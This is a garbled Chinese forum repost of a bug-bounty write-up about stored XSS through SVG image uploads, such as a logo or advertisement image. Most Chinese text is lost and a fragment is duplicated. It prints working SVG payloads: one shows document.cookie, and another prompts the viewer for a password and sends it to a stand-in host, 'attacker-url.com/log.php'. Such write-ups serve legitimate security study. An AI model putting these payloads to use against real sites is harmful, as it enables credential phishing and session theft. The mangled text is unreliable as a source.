[16428] 2021-02-11_安全研究利用图片上传功能实现存储型XSS

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-02-11_安全研究利用图片上传功能实现存储型XSS   |   X S S c l o u d s   F r e e B u f   2 0 2 1 - 0 2 - 1 1 X S S S t o r e d   X S S $ 1 0 0 0 1 W E B ; 2 3 W E B 4 s q l i x s s s s t i L o g o ,   B a c k g r o u n d   I m a g e     A d v e r t i s e m e n t   I m a g e s v g 5  
6 F i l e u p l o a d . s v g F i l e u p l o a d . s v g . p n g 7 N e x t 访 8 V i e w   I m a g e s v g   x s s s v g X S S   P a y l o a d P a y l o a d < ? x m l   v e r s i o n = 1 . 0 "   s t a n d a l o n e = n o ? > < ! D O C T Y P E   s v g   P U B L I C   - / / W 3 C / / D T D   S V G   1 . 1 / / E N   h t t p : / / w w w . w 3 . o r g / G r a p h i c s / S V G / 1 . 1 / D T D / s v g 1 1 . d t d " > < s v g   v e r s i o n = 1 . 1 "   b a s e P r o f i l e = f u l l   x m l n s = h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " > < p o l y g o n   i d = t r i a n g l e   p o i n t s = 0 , 0   0 , 5 0   5 0 , 0 "   f i l l = # 0 0 9 9 0 1 "   s t r o k e = # 0 0 4 4 0 0 " / > < s c r i p t   t y p e = t e x t / j a v a s c r i p t > a l e r t ( d o c u m e n t . c o o k i e ) ; < / s c r i p t > < / s v g > < ? x m l   v e r s i o n = " 1 . 0 "   s t a n d a l o n e = " n o " ? > < ! D O C T Y P E   s v g   P U B L I C   " - / / W 3 C / / D T D   S V G   1 . 1 / / E N "   " h t t p : / / w w w . w 3 . o r g / G r a p h i c s / S V G / 1 . 1 / D T D / s v g 1 1 . d t d " > < s v g   v e r s i o n = " 1 . 1 "   b a s e P r o f i l e = " f u l l "   x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " > < p o l y g o n   i d = " t r i a n g l e "   p o i n t s = " 0 , 0   0 , 5 0   5 0 , 0 "   f i l l = " # 0 0 9 9 0 0 "   s t r o k e = " # 0 0 4 4 0 0 " / >                 < s c r i p t >                                   v a r   p a s s w d   =   p r o m p t ( " E n t e r   y o u r   p a s s w o r d   t o   c o n t i n u e " ) ;                                 v a r   x h r   =   n e w   X M L H t t p R e q u e s t ( ) ;                                 x h r . o p e n ( " G E T " , " h t t p s : / / a t t a c k e r - u r l . c o m / l o g . p h p ? p a s s w o r d = " + e n c o d e U R I ( p a s s w d ) ) ;
9 S V G 1 0 V i e w   I m a g e 访 s v g 1 1 X S S   P a y l o a d $ 1 0 0 0                                 x h r . o p e n ( " G E T " , " h t t p s : / / a t t a c k e r - u r l . c o m / l o g . p h p ? p a s s w o r d = " + e n c o d e U R I ( p a s s w d ) ) ;                                 x h r . s e n d ( ) ; < / s c r i p t > < / s v g >

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则